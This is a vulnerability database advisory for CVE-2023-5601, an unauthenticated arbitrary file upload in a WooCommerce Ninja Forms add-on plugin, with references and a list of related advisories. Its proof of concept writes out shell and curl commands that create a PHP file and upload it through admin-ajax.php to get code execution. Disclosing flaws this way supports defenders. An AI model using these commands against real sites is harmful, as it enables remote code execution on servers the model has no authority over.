WordPress Plugin Vulnerabilities

WooCommerce Ninja Forms Product Add-ons < 1.7.1 - Unauthenticated Arbitrary File Upload

Description

The plugin does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.

Proof of Concept

Make sure to have both WooCommerce and NinjaForms 3.4.34.2 (NF's latest version on the 3.4 branch) installed, then follow those instructions:

1 - Run the following shell command to create a PHP file who's mime type will be detected as text/plain:

echo 'Hello world! <?php phpinfo();' > shell.php

2 - Run the following curl command to upload the malicious PHP file onto the site:

curl 'https://example.com/wp-admin/admin-ajax.php' -F 'action=wc_nf_submit' -F 'f[]=@shell.php'

3 - Visit the uploaded shell at 'https://example.com/wp-content/uploads/YYYY/MM/shell.php

Affects Plugins

Plugin icon
woocommerce-ninjaforms-product-addons
Fixed in 1.7.1

References

CVE
CVE-2023-5601

Miscellaneous

Original Researcher
Alexander Concha
Verified
Yes
WPVDB ID
0035ec5e-d405-4eb7-8fe4-29dd0c71e4bc

Timeline

Publicly Published
2023-10-16 (about 6 months ago)
Added
2023-10-16 (about 6 months ago)
Last Updated
2023-10-16 (about 6 months ago)

Other

Published
Title
Published
2015-02-12
Title
Photo Gallery <= 1.2.5 - Unrestricted File Upload
Published
2023-12-18
Title
Essential Real Estate < 4.4.0 - Subscriber+ Arbitrary File Upload
Published
2024-03-25
Title
Everest Backup < 2.2.5 - Admin+ Arbitrary File Upload
Published
2022-04-19
Title
Advanced Uploader <= 4.2 - Subscriber+ Arbitrary File Upload
Published
2012-06-01
Title
Gallery 3.06 - Unauthenticated File Upload PHP Code Execution